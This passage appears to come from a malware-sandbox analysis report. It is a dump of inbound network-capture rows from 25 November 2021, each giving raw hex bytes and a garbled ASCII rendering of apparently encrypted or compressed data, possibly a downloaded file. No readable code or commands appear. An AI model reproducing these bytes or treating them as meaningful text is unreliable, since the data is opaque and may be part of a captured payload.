fc f6 ff 2e 51 78 3c 2c 1b 55 bb fb 65 e5 65 40 6d 52 fb 8d 17 d4 67 af 95 11 21 08 11 9a 41 45 5a e4 f6 d6 2d 7a a6 8a 28 0c ce bb 50 45 96 9a f2 98 f6 2d ac dd 8d f1 f8 17 f7 22 b2 45 a5 41 b2 fe 04 b4 af 20 1a 7c Data Ascii: cZ\|z&$1MJ!Y]T{LW?Bch~enC7b*{~f~lBYP)q'ZbK~F7?&N`.C+K;sG_r/x!Y<.Wi#U.Qx<,Uee@mRg!AEZ-z(PE-"EA \|
2021-11-25 15:51:58 UTC	1065	IN	Data Raw: 9d 3b 4e 15 5d e2 2f 0b bf 80 de d6 36 c0 13 dc d7 d2 4d 7b 48 30 9e a6 b5 7e 12 ce 3c 46 b9 1e eb 14 01 e1 3e 27 01 e1 cf b5 c0 3e 98 06 2b 74 8f 11 d6 93 ae 53 e0 0f 3f 98 38 39 49 c3 93 78 a7 31 79 29 06 45 49 dc cc 64 16 34 8b 17 31 85 7d 23 dc d2 3f a9 49 c2 13 c4 1c 18 2a 70 3b b5 ef 10 08 4a 23 ef 06 54 cf aa 6d ff 3e 29 1c 80 3f 24 66 81 f3 71 b6 a6 26 6e 98 03 c9 87 6d d1 cd 8f 74 56 79 31 94 91 0e bf f0 fd 0c 5b f9 94 82 8c 8b dc c8 64 0f 4f ef e3 99 09 b0 d9 37 d4 24 84 24 8f 74 a8 20 9f 82 e3 7b 13 62 8a fc e1 be 51 4d 48 cd 9c ad 07 22 63 33 be 17 41 dd 22 9c bf 8d 08 30 f8 05 a7 26 9d 3d 9b 36 dd 2e 02 33 71 29 0e d8 a2 4f f9 1c 6b 5d 56 e9 04 b2 7f 46 36 69 db 3c 1d 0a 4a c5 88 da 67 ab 58 74 4b 68 05 3c 22 63 88 e6 04 55 6c b6 f6 e5 4f f0 Data Ascii: ;N]/6M{H0~<F>'>+tS?89Ix1y)EId41}#?I*p;J#Tm>)?$fq&nmtVy1[dO7$$t {bQMH"c3A"0&=6.3q)Ok]VF6i<JgXtKh<"cUlO
2021-11-25 15:51:58 UTC	1069	IN	Data Raw: 24 c0 bf e3 1a 26 f4 e0 07 a5 be 17 29 45 c9 86 89 a4 b8 e4 47 c5 83 ac db 18 09 aa 27 a4 d4 4c cb f7 69 35 2a 9a 4f 8a 51 7a 53 97 98 34 ef f9 39 b7 9f a7 67 99 eb 3b bb f0 78 c0 08 f7 6b 6f 94 02 b7 42 6a 86 4a cb 0a 54 1d 81 c1 25 d3 80 74 37 ae 24 43 63 07 33 89 ae c0 da 97 80 bb 92 15 62 82 e5 23 90 76 24 68 b0 5b 54 59 55 63 00 7e b5 57 e0 18 03 03 38 0e a7 4e f8 a7 a6 aa 30 87 df 41 18 c8 81 f0 65 e2 a6 12 da e0 d3 08 97 be 00 60 e1 4c 3d 8d 91 96 35 b2 7e 7a c7 56 83 c3 19 ca 77 2c 19 39 44 a1 a7 97 8e 82 f4 51 54 c2 9e 3c ce ad 90 e8 37 24 7e 58 74 5c ce 52 a7 a5 15 b1 d1 09 28 20 98 cb dc ab a4 21 11 2a 66 7c b7 79 25 0b 19 de bf 67 0e 57 6f 17 20 8c 60 78 9d 8e e1 34 3b 41 c1 1e 8b 0c ac 0b 42 3d eb 55 64 65 b1 d2 ba 54 f3 0b 24 b1 80 5e 20 0d Data Ascii: $&)EG'Li5OQzS49g;xkoBjJT%t7$Cc3b#v$h[TYUc~W8N0Ae`L=5~zVw,9DQT<7$~Xt\R( !f\|y%gWo `x4;AB=UdeT$^
2021-11-25 15:51:58 UTC	1073	IN	Data Raw: 4d 3e 25 d3 da c1 22 94 18 f7 9a fe d6 1c 4a 7a 12 cb 84 e1 40 33 08 37 dd d8 9f b6 f6 86 f1 8d 30 13 40 a5 cc 92 93 72 e7 52 1d 59 50 1a 4d ee b0 29 0f e1 36 7d 7f 03 df 36 36 f8 0e b8 1c 47 f6 df e3 6e ae 20 b0 6b d8 69 d9 22 d3 0a af 59 8b 8d 4d d2 08 60 9f 16 70 60 24 8f 59 8c 6b 82 7c 40 42 2f 6e 93 42 be 40 20 b2 d8 27 7f d5 ac 0c b3 a3 ca 80 c8 61 4f 1d cc 83 c1 28 b1 46 56 62 44 bd f3 6f 30 e7 47 6d d4 4d 41 cf bb f2 34 45 64 89 dd 2a 09 22 8e 02 15 c4 67 e2 5d 11 1f fb 38 78 de ca 08 38 29 02 2f e0 64 8f 92 1c fa 88 4e 20 17 9d c0 69 ca cb 96 ed 47 51 4b dc f5 30 f1 68 b7 9b f4 b0 54 1a b0 f3 16 26 cf ac 59 a6 11 27 32 05 81 76 a3 4f bd f6 12 f9 a7 69 79 72 93 19 0f c9 88 97 cd 97 ee a3 c1 94 f0 89 e1 d1 38 08 ad 6f 8c f9 7d 2c 23 60 6e 99 b2 50 Data Ascii: M>%"Jz@370@rRYPM)6}66Gn ki"YM`p`$Yk\|@B/nB@ 'aO(FVbDo0GmMA4Ed*"g]8x8)/dN iGQK0hT&Y'2vOiyr8o},#`nP
2021-11-25 15:51:58 UTC	1078	IN	Data Raw: 34 1d c4 0c 66 3a 4d 97 d2 2c 9a d3 88 07 7f 30 c0 72 86 65 03 73 49 9e 26 98 90 5a db b7 f5 8e e8 77 d0 95 17 09 96 6b 3d a8 19 00 54 f0 9f c1 7d 4a c2 be 0b c3 f6 f1 e7 89 fd 00 d3 2f 81 dc e7 7d 18 19 f9 15 b5 eb 7a 40 eb 9e 51 fa c3 5a 09 e5 65 f2 2a 64 3b cf 1b fa 8f 43 e3 9a 34 df 0e 33 47 59 b8 0f e3 c9 1a a9 9c e3 cb a4 b8 92 5a 00 57 bd 2d a6 e3 f3 17 4f 44 e5 ff 7f f5 22 62 ca ba 1b 79 ba af 3d 88 9b 0a ad e1 e0 fc ed 12 56 dc 5f da 70 bd 28 f0 f7 71 a7 a6 f6 5a 47 c1 da db e3 c4 36 0f 2d 58 dc 6d 36 98 df 7b b1 95 80 0f 0b 2d 9f 51 e8 fc 1f ed 21 2a 9c 37 9c 9b 53 a7 61 04 6b f9 c9 04 53 47 5b 25 eb 6e 62 2b 5d c5 21 fc c8 a1 4a 37 bf 40 f1 3c 6e 3e 67 2a ee 0e 18 24 aa 11 70 7f 6f 44 13 10 1e e6 c3 0f 76 c0 4a 55 28 0c d1 a9 61 00 73 16 73 4b Data Ascii: 4f:M,0resI&Zwk=T}J/}z@QZed;C43GYZW-OD"by=V_p(qZG6-Xm6{-Q!7SakSG[%nb+]!J7@<n>g*$poDvJU(assK
2021-11-25 15:51:58 UTC	1082	IN	Data Raw: 9f 72 02 40 9c 78 a1 91 07 2b 91 57 eb 84 5d a9 40 9b a8 76 63 b2 82 05 1f 12 a7 a2 16 a1 78 0d bb e0 28 93 48 19 42 bf 3c b2 06 a9 85 e0 0b e2 98 7c 19 5e 5e ff 4c d3 c4 5d 0d 21 f3 db 81 e0 9d ac 81 93 a3 f3 c0 ac 48 bf 1e 8c 06 aa 30 17 b7 f7 e3 89 8d 58 11 8b 2d 56 eb eb ab 39 f2 cb 9b 68 9e 88 62 7d 70 ab 60 92 7f 04 1e 04 bb 48 87 2d 05 52 80 1b 1b ff 5b 45 cf 8f 64 0b e4 7a 6d d4 b9 97 b4 e5 1b eb ac bf 5a 98 50 67 d5 1f e0 9d db 6c 7e ca 97 0a 76 c4 7b 9e ce eb 07 7b fd 99 18 9f a4 dd ce 23 37 3c b9 a6 e9 7f 0a 31 65 5b f8 59 b9 4b d1 e7 dd 3e 41 5b df 5b 89 33 5a 73 34 c0 09 6f de 08 66 48 1f 63 96 14 7b 46 26 56 8d ed a4 05 d8 9c c8 d0 50 bf b7 a3 36 12 0d c8 86 42 e4 95 11 9b 49 9f c0 91 48 24 f2 ef b3 d5 73 fd 82 b3 7b f1 87 6c a3 96 e4 8f 88 Data Ascii: r@x+W]@vcx(HB<\|^^L]!H0X-V9hb}p`H-R[EdzmZPgl~v{{#7<1e[YK>A[[3Zs4ofHc{F&VP6BIH$s{l
2021-11-25 15:51:58 UTC	1086	IN	Data Raw: 3b b5 87 35 66 a0 1f 8a 13 3e 26 13 b8 33 9b fc 28 24 06 f4 29 7c c3 a7 b1 23 58 ca 8c 6b 19 aa d7 b7 c9 47 9c 9b 6d 2c 8c c8 6b 87 f1 7d da 2e 93 43 e0 79 11 1e 2e f8 20 c5 8f 97 5e 76 13 29 7a 92 0e d8 77 fd 3a ca 58 c4 20 fe 99 15 cc d8 d1 a7 8b 3c c7 ac 84 04 32 cf e9 8d b8 ae c2 0e 42 28 af c5 69 f5 3b b7 3c c1 7b c3 b3 48 27 05 6c f1 43 7f 7c dc 1a f1 19 3d 44 49 ef a2 d5 a1 a5 d8 c7 91 9b c6 9c ab 44 f1 b5 66 1c 88 90 97 e3 14 42 87 47 43 5c 45 1d 67 26 da ea 1d b9 b5 79 08 69 d3 a9 58 32 11 7a da e9 98 55 e8 ee 03 2b c1 6c 03 df b1 47 1b b0 db 5b 32 30 68 e5 69 03 44 a9 8a 1b 79 34 c1 df 00 71 f4 e0 56 02 2e dd e9 29 04 ad 88 b8 65 ac 4d cb 79 b5 ff e3 e8 45 74 6a 88 83 c8 ba f4 c1 44 d0 bb 61 46 83 2c 42 ec 41 12 1a fa 42 54 cb e3 a9 1d 5f 2b 63 Data Ascii: ;5f>&3($)\|#XkGm,k}.Cy. ^v)zw:X <2B(i;<{H'lC\|=DIDfBGC\Eg&yiX2zU+lG[20hiDy4qV.)eMyEtjDaF,BABT_+c
2021-11-25 15:51:58 UTC	1090	IN	Data Raw: 36 4d df 30 6b e7 68 ec f8 9c dc e4 e2 1f ab d3 27 7c 6a 60 dd 3f 73 14 43 d0 f2 96 37 16 d3 00 6a 38 e0 88 d7 ea 3c 61 0b c6 79 74 21 99 35 ee c5 63 65 7b a4 5e fe 4e 52 b0 f7 cb a7 c5 a0 d2 b7 06 f3 03 f7 52 07 f3 ed 3d b0 85 3d b0 7c f6 e7 f3 dd 93 89 77 92 64 d6 89 42 bb b4 6c 03 b7 b0 ad c2 79 ba bd be 5b d7 b4 40 78 61 a0 19 d7 04 9c 2a d5 1f d2 8c 84 54 3e 81 be c5 c2 68 ce 91 a2 b2 dd bf 3f ee 29 8a e8 8d 34 25 c6 5e 00 1e 22 6f 1d 6d 20 d9 f4 d9 76 7c 82 ed c2 be a3 06 46 b3 d0 dc d7 eb 5f 28 8b 73 aa ca 47 04 c9 fe 47 4b a3 b4 a6 72 3a e0 3b 8b 0c c2 33 b8 b6 71 8a 29 0c 10 ec b6 5e dd 20 f2 27 e6 ac ab 3a ea 8d e3 24 e3 8a 2a 5f 1c c9 e1 1a 16 68 49 eb 86 8e 98 dd b5 67 90 12 76 4c a6 d6 75 b2 a7 a7 4f df 7c 1f 4e 55 75 ff bf c9 18 81 c4 87 c8 Data Ascii: 6M0kh'\|j`?sC7j8<ayt!5ce{^NRR==\|wdBly[@xaT>h?)4%^"om v\|F_(sGGKr:;3q)^ ':$_hIgvLuO\|NUu
2021-11-25 15:51:58 UTC	1093	IN	Data Raw: f4 9d 9f b8 1a f8 78 1c ba fb 50 97 e6 19 11 72 c2 8e e8 78 de c4 2e 21 01 be 43 dc 3e 1b a4 13 44 0d 33 ee e2 8f 64 0a 66 56 2b f6 2d 7e ee 87 a9 08 c7 d4 8c 0f 11 e2 36 33 f0 d4 68 cb 94 da 5f 88 be 83 b4 28 36 51 94 bb 14 37 63 dd 06 a7 80 3b 6e fd 82 3f 79 73 f5 04 8d f0 f0 a3 fb 91 7b e8 bb 9d a7 73 57 cc 50 03 1b 80 16 22 b2 19 48 9d 9f 5b cd 82 b1 b0 01 a2 47 7e 93 e7 a2 94 20 43 39 22 56 b8 4e ea e2 21 f0 2e c0 7b e7 4e fc bc 41 f5 c9 02 c3 66 82 fa 17 0a ba 81 44 47 0b cd de c6 cd 13 a0 10 98 56 69 e8 59 8f ba 0b 72 47 ca 43 bd e6 50 fd e8 5f 4c 14 54 14 08 74 78 db 89 3d d7 75 9d 88 77 17 50 34 d8 a1 7e c2 d5 9c ec e5 72 b9 18 1b 3e 56 ec ea ff 3b b1 05 36 18 d1 0f 29 9a de 00 0f 46 42 17 7d ef a0 35 68 ec 87 07 6b b6 d0 31 2e 1f ff 78 86 ca 19 Data Ascii: xPrx.!C>D3dfV+-~63h_(6Q7c;n?ys{sWP"H[G~ C9"VN!.{NAfDGViYrGCP_LTtx=uwP4~r>V;6)FB}5hk1.x
2021-11-25 15:51:58 UTC	1097	IN	Data Raw: a3 15 ae 98 33 11 35 5a 0e be 09 ce 1c 19 01 e2 a5 36 3a 67 70 9a 9a 76 67 f5 57 5c c0 4b 4d 1f 77 df 2f dc 20 e5 a6 44 bc 9a d0 54 90 0d 12 b6 d0 ac 83 8c 5b d7 62 b6 73 2d e0 d0 4b a1 ea a7 86 f7 14 41 9d 1b e2 35 0a 3b cc ee d7 1a 61 13 a0 22 bf 06 0c 31 99 b0 5f 80 30 67 57 31 ba 7e 33 7c 87 2c 6d fc 91 37 ae e5 8d d1 a6 e5 27 9f 3f 85 4d 5c 9a 36 2e f6 7d 0f 63 c8 6f 9f a4 3a 48 1f fe 71 52 3d 4f 73 66 8b 48 4a c5 20 e9 e2 3f f5 86 d5 de 01 82 b0 8c 65 44 4f 0c 76 fc 84 10 e0 0f 15 9e 77 c6 a2 49 a8 d5 b3 8a a2 8e 2a 44 d5 bd e4 b5 d5 4e 15 02 8c ba 7e 41 44 82 70 1c 04 8e 55 5f f3 01 ce 62 7b 7b 08 7b 78 94 a0 ee d8 38 d6 a2 03 9a 14 bb eb b4 86 37 12 a9 18 dc 70 c5 43 cf e5 7e 1c 56 b0 7d b4 7e 2d d3 8c 1a 20 45 d6 7c 6f e2 b1 8d 4f 04 f3 9c 57 47 Data Ascii: 35Z6:gpvgW\KMw/ DT[bs-KA5;a"1_0gW1~3\|,m7'?M\6.}co:HqR=OsfHJ ?eDOvwI*DN~ADpU_b{{{x87pC~V}~- E\|oOWG
2021-11-25 15:51:58 UTC	1101	IN	Data Raw: 02 72 93 02 7c b4 1c a6 3d ef 45 b7 38 e7 f8 76 2a a3 30 d4 56 ee 8f e2 8c 84 00 cc 3f 7a 2c 96 a6 a0 c1 34 51 20 15 9c bf 4f 7d 71 91 df fd 01 22 bb 76 12 d1 b6 ad dd fb 95 25 c9 fd 0f fe 39 4b e6 41 f3 f5 31 e6 60 73 f2 ac 8b 91 00 cc 61 8c 8a b2 ae b5 4b 8a 72 6b 86 d9 17 9f a2 62 84 15 b2 79 1f f7 0a 8f 55 67 08 1d c7 39 5d 78 d1 2f 02 c7 e7 70 8d 66 10 fb 1f 9d 55 b6 55 3f 6f c7 b8 1d 95 a4 b1 8e 31 6f ea 9c e2 25 48 04 12 4f 2b 8d 9a 7a ec c9 bd 95 bd b3 eb 5d 52 40 33 c1 bb a8 94 90 b7 67 55 e0 06 3a e3 f5 bb 23 cb c4 0e 56 3b 33 23 1c 93 dc 27 b0 69 66 26 4d 07 a4 f4 7b 2d 12 06 ab fe 6d eb a5 df de 70 24 f2 93 d0 64 cc 41 5e ca fb 9d e2 46 54 9c 89 39 e5 75 4b b9 7b 29 b9 91 0c 35 44 fd 7c 81 86 a4 50 a3 a8 43 ec d6 4d 33 55 34 cf 91 ea 35 0a 1f Data Ascii: r\|=E8v*0V?z,4Q O}q"v%9KA1`saKrkbyUg9]x/pfUU?o1o%HO+z]R@3gU:#V;3#'if&M{-mp$dA^FT9uK{)5D\|PCM3U45
2021-11-25 15:51:58 UTC	1105	IN	Data Raw: fa b3 9e 90 47 ce 9d 50 25 a2 56 9b c2 d2 01 95 9d 86 28 e6 63 1a e7 f9 16 13 cb cd 4d 89 19 f4 5b 29 48 bb 20 53 3c c6 85 fd f5 5f 8c 75 fd 71 67 fc f0 fd 55 00 c2 ba 01 ec 24 c1 59 4c 6d db 73 d3 0a ec 91 8e b0 b3 ea a8 17 be 3e 65 98 4a a4 30 69 f4 2c 23 28 21 16 0d 84 61 da 07 c7 a2 2e cb 0e aa 5c e4 0c 5f 7a 90 cd 3e 1b b2 8e 20 05 a7 03 b1 5a ed b3 01 d2 af 79 92 86 c4 68 7a 34 68 3a 39 1d 84 d9 76 b4 2d 78 7b 8b 0c 81 1a 3f c1 f0 e5 7f cd 2f 56 a6 be 45 bb 28 e4 a4 23 51 80 aa 46 42 fa 39 7b d2 ea e8 8e f8 b3 49 5a 0b 91 60 89 d8 3b 04 47 0d 5c b7 04 28 e8 db 6f 21 b7 02 a9 8c e1 24 58 dd 24 33 1b 84 15 25 7f 14 a5 02 69 de d6 c6 56 ad a7 2c 39 f7 04 20 de e4 e0 bc 83 a1 01 6c 91 89 c8 05 f6 18 89 e8 dc a4 d8 a9 fb cf ce 6c 9d b0 13 19 51 f6 00 77 Data Ascii: GP%V(cM[)H S<_uqgU$YLms>eJ0i,#(!a.\_z> Zyhz4h:9v-x{?/VE(#QFB9{IZ`;G\(o!$X$3%iV,9 llQw
2021-11-25 15:51:58 UTC	1110	IN	Data Raw: 43 6e 2c 74 13 8b 10 bc bf e9 06 7b 35 cc 52 93 b6 5a c6 c2 51 37 6f 6a ce b0 22 91 3a 32 5e 16 31 d8 82 da 74 35 54 56 52 aa c3 6b e3 91 9a 03 7a 8c f8 0a c0 10 e1 75 6b e6 30 55 ee 59 9e 62 57 45 37 e8 5b 0e 5d 4e b3 ad 2a 38 a2 e3 b4 47 e8 5a db 9f 89 b3 21 ca d3 81 f8 6f 16 11 22 3f 0d 3a 4f 65 e8 c0 2d 90 1e db 92 f1 bf e2 99 ec db f2 a2 f6 63 ef d6 41 93 00 a1 61 d1 8f 2a 03 c5 8b 2a 0c 10 9a 3b 81 5a bb b1 99 b2 68 96 2b 20 6f f1 0a ce 14 a4 e4 cf 99 7f b4 7b 7d 88 15 32 3d d4 b1 ea 02 ac cc 20 d7 4f 3b 2a ae 8d bb 76 3f 3b 8e 58 b3 c6 52 53 9c 0c 91 ab ef 29 89 a2 0d 58 25 46 28 ff 1a 38 43 b3 bd db e3 f6 c4 fd 4f 95 24 7f 63 a6 ba b5 38 2e 8a 94 f2 0e 7a 81 1e 36 30 fe e9 9e f9 9b 4e 6a dc b8 f1 f3 eb fd bf 56 09 f4 aa 7c e7 b7 ff 6a a7 43 8f 54 Data Ascii: Cn,t{5RZQ7oj":2^1t5TVRkzuk0UYbWE7[]N8GZ!o"?:Oe-cAa;Zh+ o{}2= O;v?;XRS)X%F(8CO$c8.z60NjV\|jCT
2021-11-25 15:51:58 UTC	1114	IN	Data Raw: 0d 02 51 44 3d 37 c9 a3 be f6 7a f1 24 23 63 d8 67 e9 1d 3d 9d cf 1a 05 4b 26 0c 89 f4 97 48 83 00 1e 91 7d ed b2 40 72 a2 fc 0e 59 cc 71 e5 02 81 cc c4 f6 13 c4 b4 d3 5b 9c 13 02 87 15 d7 f7 ac c1 e5 e1 82 e8 31 82 fa 26 14 e5 44 51 9a c3 13 6f 3b dc 80 08 44 d9 a8 e6 1f 5e b5 df 60 ee bd 87 c6 d6 d4 bd 06 5f 44 f7 f9 16 29 05 43 5c c5 f7 28 7f 7d 8e cf 58 ca 70 c1 bd f7 51 4f b1 f4 88 17 12 72 05 ac 08 80 4f b9 e0 6b 99 3b c7 a9 7f d9 9b 3d 49 40 d3 89 6c 0b 71 4e f1 b4 c8 aa 66 1c d4 5a e3 06 34 fb 55 c3 54 a8 95 93 19 f5 70 f7 30 d3 76 6d 9f b3 d9 38 40 01 29 fc 45 ad 0e 15 03 32 f8 6c 10 81 2b d7 7d 58 c3 55 a7 77 de 0f 62 8c 02 b7 63 59 57 b8 a8 07 b3 b7 08 d7 fe 07 67 37 d6 d5 af 84 71 1b 3d 0a 58 de ab da 53 da c5 30 8c 06 d2 42 5b 20 96 c1 c6 6f Data Ascii: QD=7z$#cg=K&H}@rYq[1&DQo;D^`_D)C\(}XpQOrOk;=I@lqNfZ4UTp0vm8@)E2l+}XUwbcYWg7q=XS0B[ o
2021-11-25 15:51:58 UTC	1118	IN	Data Raw: 30 ec 93 ec 06 ab d2 79 d9 e3 57 9c d8 64 14 f9 5e 80 f1 53 8e 3a 30 4d e7 24 9e f5 6a 70 68 2c 5b 39 44 64 3f 66 bd 4b 33 34 20 e8 8a 40 61 62 93 95 3f ec f5 b9 6c 76 8b 91 d6 6c de a7 44 50 54 3d b7 7a 1d 5e e0 17 49 0b fe d4 12 43 13 98 f7 e0 f9 f6 78 fd 8b ab 0c e6 24 bb 40 ac 11 32 52 db 04 cd ca 8c b9 99 d1 c5 d9 69 ae 02 02 f9 af d8 da 3a c6 83 c7 fb 7c a3 1a a6 0a da a7 46 9b 61 b2 c3 d3 9c e7 fc 7b f1 0d c9 b2 77 b0 65 37 15 e8 3f 99 9f d2 7c 1d ef b6 eb b9 54 7f d4 31 3a c8 71 31 79 3d 02 5c a1 36 74 07 e2 ab cf 89 07 be 60 aa a4 17 f8 27 46 4d 2e 07 b2 5c 4d 75 5b 85 0b c6 37 65 b4 1a e6 fa e1 90 16 f1 a2 f2 79 b2 a7 bd e6 e0 a3 3d 06 94 99 ea 24 4b 49 33 d6 27 c2 9b a6 b1 f9 48 3f b0 16 b1 4f d6 17 e8 cf 8e 89 9a d2 d9 34 ae 83 6d f0 ad aa ef Data Ascii: 0yWd^S:0M$jph,[9Dd?fK34 @ab?lvlDPT=z^ICx$@2Ri:\|Fa{we7?\|T1:q1y=\6t`'FM.\Mu[7ey=$KI3'H?O4m
2021-11-25 15:51:58 UTC	1122	IN	Data Raw: e8 bc 36 0b f3 93 80 10 dd 43 97 fb 40 cc 5d 12 10 4a 6c 15 47 cd 67 87 66 1c a2 ad 36 91 41 c1 cd c6 41 11 c6 cb 31 3c fc 52 36 0b 27 52 b6 de 7b a7 50 ec ca 2c f6 ce 0c 6e 7b e5 4f 50 22 9c 13 e0 7b ec 5e a8 fe 13 63 c6 3e a0 02 d9 13 49 b7 3c a7 9e d8 49 c9 23 98 36 de 93 77 9d 3a fc 8c d3 e2 e5 11 4a b4 4d 49 94 10 ef 38 88 18 da 7f 80 1d 7e 24 8a 5c 6d cb 77 49 be b3 ef a8 11 26 26 e7 cc 3d bc e1 66 d6 70 f5 5c e7 32 26 a2 16 8e 01 ee 4e a3 3e 3d c2 58 f6 f9 d5 0d 3a 93 52 42 62 ec ee 91 c5 b5 c9 fe d0 c5 51 dc 2d 54 29 db a0 b8 bd 8a 57 73 be 9b f5 5f 7f 97 61 18 af 90 19 93 a8 71 62 de 38 1a 73 a8 19 aa 89 51 ea 33 9b 4c b0 db de 07 c7 e2 08 52 8b e0 ff 61 9f dd 3e 4f c1 1c ad 4f 8c de 87 0c 9d 1a 99 03 b5 09 de a7 04 9f df 77 ca a5 76 fd 79 27 04 Data Ascii: 6C@]JlGgf6AA1<R6'R{P,n{OP"{^c>I<I#6w:JMI8~$\mwI&&=fp\2&N>=X:RBbQ-T)Ws_aqb8sQ3LRa>OOwvy'
2021-11-25 15:51:58 UTC	1125	IN	Data Raw: 73 8a 68 de f8 c1 fa 03 36 4d 61 da 38 38 a5 57 f6 e7 8a f5 5d e6 b1 0a b6 45 37 c3 96 5e ec 43 de 94 90 ce 54 c0 8e e7 f7 60 84 df 70 3f d7 d4 b9 7a 19 8a 51 6e 29 11 ee 63 9c 0e 22 e4 0e 6c 25 8e 23 64 19 f0 04 8a f0 fa 90 e3 ef c1 af 33 b2 44 cb 0f 6c ca 07 d4 d2 54 0b 2f 3e a2 83 ae f3 57 d8 f8 97 be ac ac 93 69 49 74 31 41 d1 7f 95 11 f5 bb 4f 61 78 a6 b7 e5 a8 a8 85 b0 71 bb 57 1b cd f5 ac 23 ac 83 f1 19 ed 52 7a ca d4 7f 89 48 d0 64 8e 4c e5 68 67 e9 39 ae 6a b8 1e 95 7f cb aa 48 3a fa 2f ca 02 2e 71 8c 08 30 f5 dc eb 1f 97 90 6d e8 e3 0a 8c 6d 42 b6 f6 91 c8 ad e2 1e 3b 96 80 a3 2c 7a 6c 31 7f cb 8e 68 6d d2 bd fe 94 ef 5b f5 d9 94 b6 52 7d 0f fb a8 6a 14 72 69 54 00 13 2d 3d f5 bd 79 40 18 ef 61 81 4d 79 12 71 b1 09 44 ec 88 cd 76 64 ed b7 9e 21 Data Ascii: sh6Ma88W]E7^CT`p?zQn)c"l%#d3DlT/>WiIt1AOaxqW#RzHdLhg9jH:/.q0mmB;,zl1hm[R}jriT-=y@aMyqDvd!
2021-11-25 15:51:58 UTC	1129	IN	Data Raw: 58 20 23 dc 4a 03 25 ff 7a 16 bf 58 da f4 50 71 1a fa a2 f5 79 d9 8f 13 94 78 be a1 3f 75 65 b4 e7 b0 5d c6 ff f1 a3 fb e1 8c 3c ee fa 53 63 67 4a 5d 31 9b 97 24 30 76 c4 1a 4d 76 13 82 06 81 cc 14 27 ba d6 16 65 e5 33 60 4b 65 0e 43 87 25 c0 1a f5 8f 10 3c a6 01 3c c2 13 88 c6 2a 07 b9 e3 9e a0 99 59 a7 02 e1 f1 71 c7 a5 6b 16 ca 7c 1d 08 72 48 30 f7 1a 3a c1 dd 56 4a 1f 3b f0 78 08 06 67 cb 9c 40 67 88 26 27 22 ac b6 5c dd 7d 46 8c bd ee db 6d 1c 6d 95 02 f6 11 13 f5 1c 21 98 a6 57 bd ba 8e d3 39 fd d5 d0 ea 01 3a 30 9c 3b 42 ed b9 a2 44 42 b5 af e2 48 67 61 91 4a d7 64 9b 84 75 70 9e 39 b3 33 71 ba 3b 1e cd f1 c5 77 63 aa a4 1f a5 e2 c6 1f 9f 83 55 ff cf 78 80 e2 31 d9 78 f0 70 19 59 26 cf e8 89 cd 38 bd 19 d1 6e d8 3b 4e fc 7e ab 5f 6b f1 e6 f2 ce 29 Data Ascii: X #J%zXPqyx?ue]<ScgJ]1$0vMv'e3`KeC%<<*Yqk\|rH0:VJ;xg@g&'"\}Fmm!W9:0;BDBHgaJdup93q;wcUx1xpY&8n;N~_k)
2021-11-25 15:51:58 UTC	1133	IN	Data Raw: e7 ab 36 54 90 6a d9 54 90 62 ed 8e 7e 04 d8 e2 2c 5f 74 ef 8c 30 6a ee 0e 04 d8 fa 71 84 19 64 e9 50 9b 11 b6 49 2a ae af f7 f9 2c 75 5e f6 9d d8 2e 6e 30 6b c7 71 dc 3a f7 f9 43 3b 75 bc ce df fb ef d5 4c c0 80 28 7f bb 0f 8c 02 eb 94 85 97 fc 69 7f a7 03 58 5e f4 8d 82 ac b0 ed 92 3b cd 3f c7 13 b1 57 0b 4d 25 4b 22 19 a6 d8 c0 29 fe d0 dc 5b 78 fa 76 ce d8 7e 21 f8 73 76 3c 01 69 2a 70 c8 e4 2d f8 6e c6 d3 5b 4d 2b 36 51 db b4 72 cf aa b2 2c 7e 2e 64 d4 c3 b3 2e 90 74 6c da 92 7a 20 1c 0a c7 59 0d 6f 43 fb e1 69 54 b4 90 54 af 13 8d 46 8c 3d a6 7d 96 55 0d 88 0e 37 d8 d0 d8 a5 c4 98 64 93 f0 36 58 1d 9d 41 3b 79 b7 28 7a 05 52 ad 35 e1 aa 78 33 26 06 1b 9b 12 30 ba 95 39 d6 12 30 96 6f cf 5a 4e 99 04 de 5b 78 01 67 ac b4 03 5c 4d 26 73 45 34 67 4d 29 Data Ascii: 6TjTb~,_t0jqdPI,u^.n0kq:C;uL(iX^;?WM%K")[xv~!sv<ip-n[M+6Qr,~.d.tlz YoCiTTF=}U7d6XA;y(zR5x3&090oZN[xg\M&sE4gM)
2021-11-25 15:51:58 UTC	1137	IN	Data Raw: d5 4e 40 41 dc 38 b1 24 e3 a9 d4 cc 10 39 24 0b bd 0a 4a aa 1b 9d 62 ee b1 24 4b 25 c2 ff af 2f a3 c9 38 55 5a 82 46 b0 ca eb 95 ee 19 a0 4a aa a7 c3 59 00 c5 76 10 39 fc 68 ed 92 43 39 ec 17 77 bc 78 32 92 70 31 e3 55 09 c8 e9 1c 18 ad 35 52 91 64 ec 88 0a 72 c1 30 6e 9c 5f 23 8e 25 81 c0 85 f6 7e 40 46 d8 c1 10 3e 30 6e d8 c1 58 82 36 5f 5b 7a 02 d9 74 c4 cc e7 9f d1 94 6a 1e 12 fa 75 52 90 86 16 a8 b8 12 30 e1 aa 37 dd 2a 7c bb 0b dd bc 14 35 7a 34 27 85 c2 f9 a8 b8 ca ed f2 01 07 54 fb eb f9 f6 09 4e e8 18 59 06 cc e6 0d 44 8b 83 ad 34 5b 7b 91 f1 44 be 41 39 18 20 dd bf d3 54 67 66 64 ee 85 93 7d af bf 02 4a af b7 1e 88 08 6d 57 af 2a d6 cc ac b5 7e 21 e8 1b f5 fb 81 99 90 7f d3 54 eb 90 06 d5 4e 99 e8 1b b5 1b a5 c3 45 32 a6 45 f2 03 90 7e e8 1a f2 Data Ascii: N@A8$9$Jb$K%/8UZFJYv9hC9wx2p1U5Rdr0n_#%~@F>0nX6_[ztjuR07\|5z4'TNYD4[{DA9 Tgfd}JmW~!TNE2E~
